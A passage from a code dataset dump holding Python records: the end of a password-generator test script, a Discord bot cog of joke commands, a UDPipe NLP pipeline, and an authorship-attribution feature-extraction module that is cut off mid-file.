c_ok)\r\n\telse:\r\n\t\tprint('m:n' + ' ' * 7 + c_fail)\r\n\r\n\ttest_m = check_output(['python', name, '-m', 's'])\r\n\tsys.stdout.write(test_m)\r\n\tif len(test_m) == 17:\r\n\t\tprint('m:s' + ' ' * 9 + c_ok)\r\n\telse:\r\n\t\tprint('m:s' + ' ' * 9 + c_fail)\r\n\r\n\ttest_m = check_output(['python', name, '-m', 'ln'])\r\n\tsys.stdout.write(test_m)\r\n\tif len(test_m) == 17:\r\n\t\tprint('m:ln' + ' ' * 8 + c_ok)\r\n\telse:\r\n\t\tprint('m:ln' + ' ' * 6 + c_fail)\r\n\r\n\ttest_m = check_output(['python', name, '-m', 'ls'])\r\n\tsys.stdout.write(test_m)\r\n\tif len(test_m) == 17:\r\n\t\tprint('m:ls' + ' ' * 8 + c_ok)\r\n\telse:\r\n\t\tprint('m:ls' + ' ' * 6 + c_fail)\r\n\r\n\ttest_m = check_output(['python', name, '-m', 'ns'])\r\n\tsys.stdout.write(test_m)\r\n\tif len(test_m) == 17:\r\n\t\tprint('m:sn' + ' ' * 8 + c_ok)\r\n\telse:\r\n\t\tprint('m:ns' + ' ' * 6 + c_fail)\r\n\r\n\ttest_m = check_output(['python', name, '-m', 'lns'])\r\n\tsys.stdout.write(test_m)\r\n\tif len(test_m) == 17:\r\n\t\tprint('m:lns' + ' ' * 7 + c_ok)\r\n\telse:\r\n\t\tprint('m:lns' + ' ' * 5 + c_fail)\r\n\r\n\r\n\tprint('\\ncombined test:')\r\n\r\n\ttest_cmb = check_output(['python', name, '-l', '16', '-m', 'ln', '-d', '-', '-dl', '4'])\r\n\tsys.stdout.write(test_cmb)\r\n\tif len(test_cmb) == 20:\r\n\t\tprint('cmb' + ' ' * 9 + c_ok)\r\n\telse:\r\n\t\tprint('cmb' + ' ' * 7 + c_fail)\r\n\r\n\ttest_cmb = check_output(['python', name, '-l', '20', '-m', 'lns', '-d', '-', '-dl', '4'])\r\n\tsys.stdout.write(test_cmb)\r\n\tif len(test_cmb) == 25:\r\n\t\tprint('cmb' + ' ' * 9 + c_ok)\r\n\telse:\r\n\t\tprint('cmb' + ' ' * 7 + c_fail)\r\n\r\n\tprint('\\nsave test:')\r\n\r\n\ttest_s = check_output(['python', name, '-s'])[:16]\r\n\tprint(test_s)\r\n\tif test_s == open('password.txt').read()[:16]:\r\n\t\tprint('s' + ' ' * 11 + c_ok)\r\n\telse:\r\n\t\tprint('s' + ' ' * 9 + c_fail)\r\n\r\n\ttest_s = check_output(['python', name, '-fs'])[:16]\r\n\tprint(test_s)\r\n\tif test_s == open('password.txt').read()[:16]:\r\n\t\tprint('fs' + ' ' * 10 + c_ok)\r\n\telse:\r\n\t\tprint('fs' + ' ' * 8 + c_fail)\r\n\r\n\ttest_s = check_output(['python', name, '-s', '-f', 'file.txt'])[:16]\r\n\tprint(test_s)\r\n\tif test_s == open('file.txt').read()[:16]:\r\n\t\tprint('s f' + ' ' * 9 + c_ok)\r\n\telse:\r\n\t\tprint('s f' + ' ' * 7 + c_fail)\r\n\r\n\r\n\tsystem_call(['rm', 'password.txt'])\r\n\tif os.path.isfile('password.txt') == False:\r\n\t\tprint('rm' + ' ' * 10 + c_ok)\r\n\telse:\r\n\t\tprint('rm' + ' ' * 8 + c_fail)\r\n\r\n\tsystem_call(['rm', 'file.txt'])\r\n\tif os.path.isfile('password.txt') == False:\r\n\t\tprint('rm' + ' ' * 10 + c_ok)\r\n\telse:\r\n\t\tprint('rm' + ' ' * 8 + c_fail)\r\n\r\n\r\n\tprint('\\nerrors:')\r\n\r\n\tsystem_call(['touch', 'password.txt'])\r\n\tsystem_call(['python', name, '-s'])\r\n\tif len(check_output(['python', name, '-s'])) == 57:\r\n\t\tprint('s' + ' ' * 11 + c_ok)\r\n\telse:\r\n\t\tprint('s' + ' ' * 9 + c_fail)\r\n\r\n\tsystem_call(['rm', 'password.txt'])\r\n\r\n\tsystem_call(['python', name, '-s', '-fs'])\r\n\tif len(check_output(['python', name, '-s', '-fs'])) == 68:\r\n\t\tprint('s fs' + ' ' * 8 + c_ok)\r\n\telse:\r\n\t\tprint('s fs' + ' ' * 6 + c_fail)\r\n\r\n\tsystem_call(['python', name, '-l', '250001'])\r\n\tif len(check_output(['python', name, '-l', '250001'])) == 39:\r\n\t\tprint('l' + ' ' * 11 + c_ok)\r\n\telse:\r\n\t\tprint('l' + ' ' * 9 + c_fail)\r\n\r\n\tsystem_call(['python', name, '-d', test_d])\r\n\tif len(check_output(['python', name, '-d', test_d])) == 39:\r\n\t\tprint('d' + ' ' * 11 + c_ok)\r\n\telse:\r\n\t\tprint('d' + ' ' * 9 + c_fail)\r\n\r\n\r\nif args.v:\r\n\tprint('pwdmkr test v{} {} by maxrt101'.format(version, test_type))\r\nelse:\r\n\tmain(args.name)\r\n","sub_path":"scripts/pwdmkr_test_script.py","file_name":"pwdmkr_test_script.py","file_ext":"py","file_size_in_byte":5104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"30212751","text":"from discord.ext import commands\nimport discord\nimport asyncio\nfrom bs4 import BeautifulSoup\nimport requests\nimport urllib.request\nimport random\n\nmagic8ball = [\"It is certain\",\n \"It is decidedly so\",\n \"Without a doubt\",\n \"Yes, definitely\",\n \"You may rely on it\",\n \"As I see it, yes\",\n \"Most likely\",\n \"Outlook good\",\n \"Yes\",\n \"Signs point to yes\",\n \"Reply hazy try again\",\n \"Ask again later\",\n \"Better not tell you now\",\n \"Cannot predict now\",\n \"Concentrate and ask again\",\n \"Don't count on it\",\n \"My reply is no\",\n \"My sources say no\",\n \"Outlook not so good\",\n \"Very doubtful]\"\n ]\n\ndef url_open(url):\n try:\n resp = requests.get(url)\n data = BeautifulSoup(resp.content, \"html.parser\")\n except Exception as e:\n print(e)\n running = False\n else:\n return data\n\nclass fun:\n \"Fun commands\"\n\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command()\n async def react(self):\n \"-Posts a random reaction image.\"\n data = url_open(\"http://replygif.net/random\")\n imgurl = data.find('img')['src']\n await self.bot.say(imgurl + '.gif')\n\n\n\n @commands.command()\n async def meme(self):\n \"-Posts a random meme image.\"\n data = url_open(\"http://www.quickmeme.com/random\")\n memeurl = data.find('img')['src']\n await self.bot.say(memeurl)\n\n @commands.command(pass_context=True)\n async def pun(self, ctx):\n \"-Posts a pun.\"\n try:\n await self.bot.delete_message(ctx.message)\n except:\n pass\n self.bot.send_typing(ctx.message.channel)\n data = url_open(\"http://pun.me/random\")\n await self.bot.say(\"`\" + data.find('span').string + \"`\")\n\n @commands.command()\n async def ask(self):\n \"-Answers a binary question\"\n await self.bot.say(\"`\" + magic8ball[random.randint(0, 19)] + \"`\")\n\n @commands.command()\n async def flip(self):\n \"-Flip a table (heads or tails)\"\n await self.bot.say(\"(╯°□°)╯︵ ┬─┬ `Heads`\" if random.randint(0, 1) else \"(╯°□°)╯︵ ┻━┻ `Tails`\")\n\n\n @commands.command(pass_context=True)\n async def quote(self, ctx, *, target = \"Mystery\"):\n \"-Posts a random quote.\"\n if \"@\" in target:\n try:\n await self.bot.delete_message(ctx.message)\n except:\n pass\n mydiv = None\n while(True):\n data = url_open(\"http://www.urbandictionary.com/random.php\")\n mydiv = data.find(\"div\", {\"class\": \"example\"})\n\n if \":\" not in str(mydiv) and \"
        \" not in str(mydiv) and \"-\" not in str(mydiv):\n break\n\n mydiv = str(mydiv).replace(\"
        \", \"\")\n mydiv = str(mydiv).replace(\"
        \", \"\")\n await self.bot.say(str(mydiv) + \"\\n -\" + target.strip())\n\n\ndef setup(bot):\n bot.add_cog(fun(bot))","sub_path":"cogs/fun.py","file_name":"fun.py","file_ext":"py","file_size_in_byte":3153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"516620568","text":"from isanlp.processor_udpipe import ProcessorUDPipe\nfrom isanlp import PipelineCommon\n\ndef create_pipeline(delay_init=False):\n return PipelineCommon([(ProcessorUDPipe('/src/parser_UDPIPE/russian-ud-2.0-170801.udpipe'),\n ['morph'],\n {'tokens' : 'tokens',\n 'sentences' : 'sentences',\n 'lemma': 'lemma',\n 'postag' : 'postag',\n 'morph' : 'morph',\n 'syntax_dep_tree' : 'syntax_dep_tree'}\n )],\n name='default')\n","sub_path":"docker/pipeline_object.py","file_name":"pipeline_object.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"481756283","text":"import c_syntax_tree as st\nimport syntax_tree\nimport stanford_parser\nfrom werkzeug import cached_property\nfrom collections import Counter\nimport pos\nimport config\nimport easyparallel\nimport heapq\nimport diskdict\nimport hashlib\nimport pickle\nimport os.path\nimport math\n\n#we agree on the following terminology:\n#\t- a document is a natural language text\n#\tfor examples, consult a bookshelf\n#\t- a document function is a (mathematical) mapping whose domain is the set of all documents\n#\texamples include POS tags, occuring ngrams\n#\t- a feature is a document function whose codomain is R^d for some natural number d (R denotes the set of real numbers)\n#\texamples include word counts, frequencies of k-ee-subtries\n#\t- a document database (or short documentbase) is a set of documents with an author assigned to each document\n#\tsuch a documentbase is the ground truth for the training\n#\t- a view is a mapping that assigns to each documentbase a feature\n#\texamples include: the word frequencies of all occuring word unigrams,\n#\tor the frequencies of all discriminative k-ee-subtrees\n#\t- a classifier is a document function which assigns, to each document, an author\n#\tour aim is to find a good classifier.\n\ndef normalizedCounter(*kwds):\n\tctr = Counter(*kwds)\n\tif not config.normalize_features:\n\t\treturn ctr\n\ts = sum(ctr.values())\n\tfactor = 1.0/sum(ctr.values())\n\treturn Counter({key: value*factor for (key,value) in ctr.items()})\ndef countermax(ctr):\n\tm=max(ctr.values())\n\tfor key,value in ctr.items():\n\t\tif value == m:\n\t\t\treturn key\n\ndocument_identifier_hashfun = hashlib.sha256\nclass document:\n\t__slots__=['text','author','identifier']\n\tdef __init__(self, text, author=None):\n\t\tself.text = text\n\t\tself.author=author\n\t\tself.identifier = document_identifier_hashfun(text.encode('utf-8')).digest()\n\t\t'''\n\t@cached_property\n\tdef identifier(self):\n\t\treturn document_identifier_hashfun(self.text.encode('utf-8')).digest()\n\t\t'''\n\tdef __getstate__(self):\n\t\treturn (self.text,self.author)\n\tdef __setstate__(self,state):\n\t\tself.__init__(*state)\nclass documentFunction:\n\t__slots__=['cachedValues','functionCollection']\n\tdef __init__(self):\n\t\t#print(\"created document function\",type(self),hasattr(self,'functionCollection'))\n\t\tif not hasattr(self,'functionCollection'):\n\t\t\traise Exception(\"no function collection?\")\n\t\tself.cachedValues={}\n\tdef setCacheDict(self,dictionary):\n\t\tself.cachedValues=dictionary\n\tdef closeCache(self):\n\t\tif isinstance(self.cachedValues,diskdict.DiskDict):\n\t\t\tself.cachedValues.close()\n\t'''def __del__(self):\n\t\tprint(\"delete document function\",type(self))'''\n\tdef getValue(self,document):\n\t\tkey=document.identifier\n\t\tif key in self.cachedValues:\n\t\t\treturn self.cachedValues[key]\n\t\tresult=self.mapping(document)\n\t\tself.cachedValues[key]=result\n\t\treturn result\n\tdef getValuev(self,documents):\n\t\t#vectorized function\n\t\tkeys = [d.identifier for d in documents]\n\t\tavailable = [key in self.cachedValues for key in keys]\n\t\tmissingIndices = [i for i in range(len(documents)) if not available[i]]\n\t\tmissingValues = self.mappingv([documents[i] for i in missingIndices]) if missingIndices else []\n\t\tif len(missingIndices) != len(missingValues):\n\t\t\traise Exception(\"Called mappingv with %u documents, got %u values.\" % (len(documents), len(missingValues)))\n\t\tresult = []\n\t\tcached_keys=[key for (key,avail) in zip(keys,available) if avail ]\n\t\tcached_values = iter(self.cachedValues.fetchMany(cached_keys)) if isinstance(self.cachedValues,diskdict.DiskDict) else \\\n\t\t\t\t\t(self.cachedValues[key] for key in cached_keys)\n\t\tmissingValues = iter(missingValues)\n\t\tfor avail,key,doc in zip(available,keys,documents):\n\t\t\tif avail:\n\t\t\t\tresult.append(next(cached_values))\n\t\t\telse:\n\t\t\t\tvalue = next(missingValues)\n\t\t\t\tresult.append(value)\n\t\t\t\t#print(\"cache value %s under key %s\" % (repr(value),repr(key)))\n\t\t\t\tself.cachedValues[key]=value\n\t\treturn result\n\t# one of mapping or mappingv must be implemented.\n\tdef mapping(self,document):\n\t\t# applies to a single text\n\t\treturn self.mappingv([document])[0]\n\tdef mappingv(self,documents):\n\t\t# vectorized function\n\t\treturn [self.mapping(d) for d in documents]\n\tdef writeValueToCache(self,document,value):\n\t\tself.cachedValues[document.identifier]=value\n\tdef valueIsCached(self, document):\n\t\treturn document.identifier in self.cachedValues\n\tdef clearCache(self):\n\t\tif isinstance(self.cachedValues,diskdict.DiskDict):\n\t\t\tself.cachedValues.close()\n\t\tself.cachedValues = {}\n\tdef getCacheAsDict(self):\n\t\treturn self.cachedValues.copy()\n\tdef setCacheAsDict(self,dictionary):\n\t\tself.cachedValues.update(dictionary)\n\tdef moveToMemory(self,documents):\n\t\tif isinstance(self.cachedValues,diskdict.DiskDict):\n\t\t\t#print(\"move to memory. Cached: \",len(self.cachedValues),\": \",repr(list(self.cachedValues.keys())[:20]))\n\t\t\tself.cachedValues.moveToMemory([document.identifier for document in documents if document.identifier in self.cachedValues])\n\t\t\tunmovable = sum(1 for document in documents if document.identifier not in self.cachedValues)\n\t\t\tif unmovable > 0:\n\t\t\t\traise Exception(\"Cannot move %d documents to memory\" % unmovable)\n\tdef removeFromMemory(self,document):\n\t\tif isinstance(self.cachedValues,diskdict.DiskDict):\n\t\t\tself.cachedValues.removeFromMemory(document.identifier)\n\tdef forgetDocument(self,document):\n\t\tif document.identifier in self.cachedValues:\n\t\t\tif isinstance(self.cachedValues,diskdict.DiskDict):\n\t\t\t\tself.cachedValues.removeFromMemory(document.identifier)\n\t\t\telse:\n\t\t\t\tdel self.cachedValues[document.identifier]\n\tdef getFunction(self,functionClass,*args):\n\t\tif hasattr(self,'functionCollection'):\n\t\t\treturn self.functionCollection.getFunction(functionClass,*args)\n\t\telse:\n\t\t\treturn functionClass(*args)\n\tdef removeFromFunctionCollection(self):\n\t\tif hasattr(self,'functionCollection'):\n\t\t\tself.functionCollection.forgetInstance(self)\nclass derivedDocumentFunction(documentFunction):\n\t#does not only look at the text but also at the outcome of another document function\n\t__slots__=['predecessorFunctionClass','predecessorFunction']\n\tdef __init__(self,predecessorFunctionClass,*kwds):\n\t\tself.predecessorFunctionClass = predecessorFunctionClass\n\t\tif not hasattr(self,'functionCollection'):\n\t\t\tself.predecessorFunction = predecessorFunctionClass(*kwds)\n\t\telse:\n\t\t\tself.predecessorFunction = self.functionCollection.getFunction(predecessorFunctionClass, *kwds)\n\t\tsuper().__init__()\n\tdef deriveValue(self,document,predecessorValue):\n\t\t#to be implemented\n\t\tpass\n\tdef mappingv(self,documents):\n\t\tvalues = self.predecessorFunction.getValuev(documents)\n\t\treturn [self.deriveValue(document,value) for (document,value) in zip(documents,values)]\n\tdef mapping(self,document):\n\t\treturn self.deriveValue(document,self.predecessorFunction.getValue(document))\nclass documentFunctionCollection:\n\t#a set of document functions that may be derived from each other\n\t__slots__=['instances']\n\tdef __init__(self):\n\t\tself.instances={}\n\t\tprint(\"CREATED documentFunctionCollection\",type(self))\n\tdef __del__(self):\n\t\tprint(\"DELETED documentFunctionCollection\")\n\tdef getFunction(self,functionClass,*kwds):\n\t\tkey = (functionClass,kwds)\n\t\tif key not in self.instances:\n\t\t\tres = functionClass.__new__(functionClass,*kwds)\n\t\t\tres.functionCollection=self\n\t\t\tres.__init__(*kwds)\n\t\t\tself.instances[key] = res\n\t\t\treturn res\n\t\treturn self.instances[key]\n\tdef getValue(self,document,functionClass,*kwds):\n\t\treturn self.getFunction(functionClass, *kwds).getValue(document)\n\tdef getValues(self,documents,functionClass,*kwds):\n\t\treturn self.getFunction(functionClass, *kwds).getValuev(documents)\n\tdef forgetFunction(self,functionClass,*kwds):\n\t\tkey = (functionClass,kwds)\n\t\tdel self.instances[key]\n\tdef forgetInstance(self,instance):\n\t\tfor key,value in self.instances.items():\n\t\t\tif value is instance:\n\t\t\t\tdel self.instances[key]\n\t\t\t\treturn\n\tdef free(self):\n\t\tfor fun in self.instances.values():\n\t\t\tfun.clearCache()\n\t\t\tfun.functionCollection = None\n\t\tself.instances = {}\n\tdef forgetDocument(self,document,functionClasses=None):\n\t\t#print(\"asked functionCollection to forget document \",document.identifier)\n\t\tif functionClasses is None:\n\t\t\tfor func in self.instances.values():\n\t\t\t\tfunc.forgetDocument(document)\n\t\telse:\n\t\t\tfor functionClass in functionClasses:\n\t\t\t\tkey = (functionClass,())\n\t\t\t\tif key in self.instances:\n\t\t\t\t\tself.instances[key].forgetDocument(document)\n\t\t\t\telse:\n\t\t\t\t\tprint(\"Asked to forget document \",document.identifier,\" for class \",functionClass,\", but have no instance for this.\")\n\tdef moveToMemory(self,docs,functionClasses=None):\n\t\t#print(\"move to memory with these instances: \",self.instances.keys())\n\t\t#print(\"functionClasses: \",functionClasses)\n\t\tfor cls,func in self.instances.items():\n\t\t\tif functionClasses is None or cls[0] in functionClasses:\n\t\t\t\tfunc.moveToMemory(docs)\n\tdef showMemoryStatistics(self):\n\t\tfor key,value in self.instances.items():\n\t\t\tprint(\"key: \",key)\n\t\t\tprint(\"type(value): \",type(value))\n\t\t\tif isinstance(value.cachedValues,diskdict.DiskDict):\n\t\t\t\tprint(key[0],\" (\",*key[1],\") has a DiskDict as cache.\")\n\t\t\telif isinstance(value.cachedValues,dict):\n\t\t\t\tprint(key[0],\" (\",*key[1],\") has a pickled cache size of \",len(pickle.dumps(value.cachedValues)),\\\n\t\t\t\t\t\t\t\t\t\t\" and \",len(value.cachedValues),\" cached values.\")\n\t\t\telse:\n\t\t\t\tprint(\"value: \",value)\n\t\t\t\tprint(\"value.cachedValues: \",value.cachedValues)\n\t\t\t\traise Exception(\"Unexpected type for cachedValues.\")\n\tdef getFeatureIdentifier(self,feature):\n\t\tfor key,feat in self.instances.items():\n\t\t\tif feature is feat:\n\t\t\t\treturn (key[0],*key[1])\n\t\traise Exception(\"Cannot find feature \"+repr(feature))\nclass feature(documentFunction):\n\t__slots__=[]\n\tdef vectorLength(self):\n\t\tpass\nclass combinedFeature(feature):\n\t#given features ft1, ..., ftn; this one maps a document d to (ft1(d), ..., ftn(d))\n\t__slots__=['subfeatures']\n\tdef __init__(self, *argss):\n\t\tprint(\"create combined feature with function collection \", self.functionCollection)\n\t\tself.subfeatures=[self.getFunction(*args) for args in argss]\n\t\tsuper().__init__()\n\tdef vectorLength(self):\n\t\treturn sum(ft.vectorLength() for ft in self.subfeatures)\n\tdef mapping(self, document):\n\t\tresult = []\n\t\tfor ft in self.subfeatures:\n\t\t\tresult+= ft.getValue(document)\n\t\treturn result\n\tdef mappingv(self, documents):\n\t\tresult = [[] for _ in documents]\n\t\tfor ft in self.subfeatures:\n\t\t\tvals=ft.getValuev(documents)\n\t\t\tfor v,r in zip(vals,result):\n\t\t\t\tr += v\n\t\treturn result\n\tdef removeFromFunctionCollection(self,subfeaturesToo=True):\n\t\tif subfeaturesToo:\n\t\t\tfor feat in self.subfeatures:\n\t\t\t\tfeat.removeFromFunctionCollection()\n\t\tsuper().removeFromFunctionCollection()\nclass derivedFeature(feature,derivedDocumentFunction):\n\t__slots__=[]\n\tpass\nclass documentbase:\n\tdef __init__(self, documents):\n\t\tself.documents = documents\n\t\t'''print(\"created documentbase\")\n\tdef __del__(self):\n\t\tprint(\"deleted documentbase\")'''\n\tdef getFunction(self,functionClass,*kwds):\n\t\tif not hasattr(self,'functionCollection'):\n\t\t\treturn functionClass(*kwds)\n\t\telse:\n\t\t\treturn self.functionCollection.getFunction(functionClass,*kwds)\n\t@cached_property\n\tdef byAuthor(self):\n\t\tresult = {}\n\t\tfor d in self.documents:\n\t\t\tif d.author in result:\n\t\t\t\tresult[d.author].append(d)\n\t\t\telse:\n\t\t\t\tresult[d.author]=[d]\n\t\treturn result\n\t@cached_property\n\tdef authors(self):\n\t\treturn list(set(self.byAuthor))\n\t@cached_property\n\tdef stDocumentbase(self):\n\t\tfunction = self.getFunction(stDocumentDocumentFunction)\n\t\treturn st.documentbase([st.documentclass(function.getValuev(documents),label=author) for (author,documents) in self.byAuthor.items()])\n\tdef subbase(self, indices):\n\t\tresult=documentbase([self.documents[i] for i in indices])\n\t\tif hasattr(self,'functionCollection'):\n\t\t\tresult.functionCollection = self.functionCollection\n\t\treturn result\n\tdef extend(self, extraDocuments):\n\t\tresult = documentbase(self.documents + extraDocuments)\n\t\tif hasattr(self,'functionCollection'):\n\t\t\tresult.functionCollection = self.functionCollection\n\t\treturn result\n\t@cached_property\n\tdef byIdentifier(self):\n\t\tresult = {}\n\t\tfor d in self.documents:\n\t\t\tif d.identifier in result:\n\t\t\t\tresult[d.identifier].append(d)\n\t\t\telse:\n\t\t\t\tresult[d.identifier] = [d]\n\t\treturn result\n\tdef strippedDuplicates(self,warn=True):\n\t\t#returns a documentbase with duplicates removed. Two documents are considered duplicate iff identifier and author coincide.\n\t\tresult = []\n\t\tfor docs in self.byIdentifier.values():\n\t\t\tknown_authors = []\n\t\t\tfor doc in docs:\n\t\t\t\tif doc.author not in known_authors:\n\t\t\t\t\tknown_authors.append(doc.author)\n\t\t\t\t\tresult.append(doc)\n\t\t\tif len(known_authors) > 1 and warn:\n\t\t\t\tprint(\"WARNING: Found same text by %d authors\" % len(known_authors))\n\t\t\t\tprint(\"authors: \",\", \".join(str(a) for a in known_authors))\n\t\t\t\tprint(\"text:\")\n\t\t\t\tprint(docs[0].text)\n\t\tresult = documentbase(result)\n\t\tif hasattr(self,'functionCollection'):\n\t\t\tresult.functionCollection = self.functionCollection\n\t\treturn result\n\tdef hasSameDocument(self,doc):\n\t\t#returns true if a document with same author and identifier occurs\n\t\tif not doc.identifier in self.byIdentifier:\n\t\t\treturn False\n\t\treturn doc.author in (d.author for d in self.byIdentifier[doc.identifier])\nclass view:\n\t__slots__=['functionCollection']\n\tdef getFeature(self,docbase):\n\t\tpass\n\tdef getFunction(self,functionClass,*kwds):\n\t\tif not hasattr(self,'functionCollection'):\n\t\t\treturn functionClass(*kwds)\n\t\telse:\n\t\t\treturn self.functionCollection.getFunction(functionClass,*kwds)\n\tdef getValue(self,document,functionClass,*kwds):\n\t\treturn self.getFunction(functionClass,*kwds).getValue(document)\n\tdef getValues(self,documents,functionClass,*kwds):\n\t\treturn self.getFunction(functionClass,*kwds).getValuev(documents)\n\tdef createClassifier(self,trainingDocbase,ml):\n\t\treturn documentClassifier(trainingDocbase,self.getFeature(trainingDocbase),ml)\n# now to the concrete stuff\nclass stanfordTreeDocumentFunction(documentFunction):\n\t__slots__=[]\n\t# to each document, return a list of stanford trees, encoding the tokenization, pos-tagging and syntactic structure\n\tdef mappingv(self,documents):\n\t\t#return stanford_parser.parseTextsParallel([d.text for d in documents])\n\t\treturn stanford_parser.parseText([d.text for d in documents])\nclass tokensDocumentFunction(derivedDocumentFunction):\n\t__slots__=[]\n\t#for each document, returns a list of tokens\n\tdef __init__(self):\n\t\tsuper().__init__(stanfordTreeDocumentFunction)\n\tdef deriveValue(self,document,trees):\n\t\t'''\n\t\t!!!!\n\t\t'''\n\t\traise \"No!\"\n\t\tresult = []\n\t\tfor tree in trees:\n\t\t\tresult += [l.data for l in tree.leaves]\n\t\treturn result\nclass tokensCounterDocumentFunction(derivedDocumentFunction):\n\t__slots__=[]\n\t#normalized\n\tdef __init__(self):\n\t\tsuper().__init__(tokensDocumentFunction)\n\tdef deriveValue(self,document,tokens):\n\t\treturn normalizedCounter(tokens)\nclass numTokensDocumentFunction(derivedDocumentFunction):\n\t__slots__=[]\n\tdef __init__(self):\n\t\tsuper().__init__(tokensDocumentFunction)\n\tdef deriveValue(self,document,tokens):\n\t\treturn len(tokens)\n'''\nclass characterNGramDocumentFunction(derivedDocumentFunction):\n\tdef __init__(self,n):\n\t\tself.n=n\n\t\tsuper().__init__(tokensDocumentFunction)\n\tdef deriveValue(self,document,tokens):\n\t\t#print(\"Called to get character n grams for text %s and tokens %s\" % (repr(document.text),repr(tokens)))\n\t\tresult = []\n\t\tfor tok in tokens:\n\t\t\tresult += [tok[i:i+self.n] for i in range(len(tok)-self.n+1)]\n\t\treturn result\n'''\nclass characterNGramDocumentFunction(documentFunction):\n\t__slots__=['n']\n\tdef __init__(self,n):\n\t\tself.n=n\n\t\tsuper().__init__()\n\tdef mapping(self,document):\n\t\tt=document.text\n\t\treturn [t[i:i+self.n] for i in range(len(t)-self.n)]\nclass characterNGramCounterDocumentFunction(derivedDocumentFunction):\n\t__slots__=['n']\n\tdef __init__(self,n):\n\t\tsuper().__init__(characterNGramDocumentFunction,n)\n\tdef deriveValue(self,document,tokens):\n\t\treturn normalizedCounter(tokens)\nclass numCharactersDocumentFunction(documentFunction):\n\t__slots__=[]\n\tdef mapping(self,document):\n\t\treturn len(document.text)\nclass posDocumentFunction(derivedDocumentFunction):\n\t__slots__=[]\n\t#for each document, returns a list of pos tokens\n\tdef __init__(self):\n\t\tsuper().__init__(stanfordTreeDocumentFunction)\n\tdef deriveValue(self,document,trees):\n\t\tresult = []\n\t\tfor tree in trees:\n\t\t\tresult += [l.label for l in tree.leaves]\n\t\treturn result\nclass posCounterDocumentFunction(derivedDocumentFunction):\n\t__slots__=[]\n\tdef __init__(self):\n\t\tsuper().__init__(posDocumentFunction)\n\tdef deriveValue(self,document,pos):\n\t\treturn normalizedCounter(pos)\nclass posNGramDocumentFunction(derivedDocumentFunction):\n\t__slots__=['n']\n\tdef __init__(self,n):\n\t\tself.n=n\n\t\tsuper().__init__(posDocumentFunction)\n\tdef deriveValue(self,document,pos):\n\t\treturn [tuple(pos[i:i+self.n]) for i in range(len(pos)-self.n+1)]\nclass posNGramCounterDocumentFunction(derivedDocumentFunction):\n\t__slots__=['n']\n\tdef __init__(self,n):\n\t\tself.n=n\n\t\tsuper().__init__(posNGramDocumentFunction,n)\n\tdef deriveValue(self,document,pos):\n\t\treturn normalizedCounter(pos)\nclass stDocumentDocumentFunction(derivedDocumentFunction):\n\t__slots__=[]\n\tdef __init__(self):\n\t\tsuper().__init__(stanfordTreeDocumentFunction)\n\tdef deriveValue(self,document,trees):\n\t\treturn st.document([syntax_tree.stanfordTreeToStTree(tree) for tree in trees])\nclass wordUnigramFeature(derivedFeature):\n\t__slots__=['words']\n\tdef __init__(self,words):\n\t\tself.words = words\n\t\tderivedDocumentFunction.__init__(self,tokensCounterDocumentFunction)\n\tdef vectorLength(self):\n\t\treturn len(self.words)\n\tdef deriveValue(self,document,tokensCounter):\n\t\treturn [tokensCounter[tok] for tok in self.words]\nclass characterNGramFeature(derivedFeature):\n\t__slots__=['n','ngrams']\n\tdef __init__(self,n,ngrams):\n\t\tself.n = n\n\t\tself.ngrams = ngrams\n\t\tderivedDocumentFunction.__init__(self,characterNGramCounterDocumentFunction,n)\n\tdef vectorLength(self):\n\t\treturn len(self.ngrams)\n\tdef deriveValue(self,document,ngramsCounter):\n\t\treturn [ngramsCounter[ngram] for ngram in self.ngrams]\nclass posNGramFeature(derivedFeature):\n\t__slots__=['n','ngrams']\n\tdef __init__(self,n,ngrams):\n\t\tself.n = n\n\t\tself.ngrams = ngrams\n\t\tderivedDocumentFunction.__init__(self,posNGramCounterDocumentFunction,n)\n\tdef vectorLength(self):\n\t\treturn len(self.ngrams)\n\tdef deriveValue(self,document,ngramsCounter):\n\t\treturn [ngramsCounter[ngram] for ngram in self.ngrams]\nclass syntaxTreeFrequencyFeature(derivedFeature):\n\t__slots__=['trees']\n\tdef __init__(self,trees):\n\t\tself.trees=trees\n\t\tderivedDocumentFunction.__init__(self,stDocumentDocumentFunction)\n\tdef vectorLength(self):\n\t\treturn len(self.trees)\n\tdef deriveValue(self,_,document):\n\t\treturn [document.frequency(tree) for tree in self.trees]\nclass characterView(view):\n\t__slots__=['ns']\n\tdef __init__(self,ns):\n\t\tself.ns = ns\n\tdef getFeature(self, docbase):\n\t\tfeatures = []\n\t\tfor n in self.ns:\n\t\t\tlimit = config.featurelimit_max_character_ngrams[n-1]\n\t\t\tfunction = self.getFunction(characterNGramCounterDocumentFunction,n)\n\t\t\tif limit is None:\n\t\t\t\tvalues=set()\n\t\t\t\tfor vals in function.getValuev(docbase.documents):\n\t\t\t\t\tvalues = values.union(set(vals))\n\t\t\t\tfeatures.append((characterNGramFeature,n,tuple(values)))\n\t\t\telse:\n\t\t\t\tvalues = Counter()\n\t\t\t\tfor doc in docbase.documents:\n\t\t\t\t\tvalues += function.getValue(doc)\n\t\t\t\tselection = heapq.nlargest(limit,values,lambda ngram: values[ngram])\n\t\t\t\tfeatures.append((characterNGramFeature,n,tuple(selection)))\n\t\t#return combinedFeature(features,self.functionCollection if hasattr(self,'functionCollection') else None)\n\t\treturn self.getFunction(combinedFeature,*features)\nclass lexicalView(view):\n\t__slots__=[]\n\tdef getFeature(self, docbase):\n\t\tfunction = self.getFunction(tokensCounterDocumentFunction)\n\t\tlimit = config.featurelimit_max_word_unigrams\n\t\tif limit is None:\n\t\t\tvalues=set()\n\t\t\t#for doc in docbase.documents:#this is not perfect\n\t\t\t#\tvalues = values.union(set(function.getValue(doc)))\n\t\t\tfor vals in function.getValuev(docbase.documents):\n\t\t\t\tvalues = values.union(set(vals))\n\t\t\treturn self.getFunction(wordUnigramFeature,tuple(values))\n\t\telse:\n\t\t\tvalues=Counter()\n\t\t\tfor doc in docbase.documents:\n\t\t\t\tvalues += function.getValue(doc)\n\t\t\tselection = heapq.nlargest(limit,values,lambda unigram: values[unigram])\n\t\t\treturn self.getFunction(wordUnigramFeature,tuple(selection))\nclass 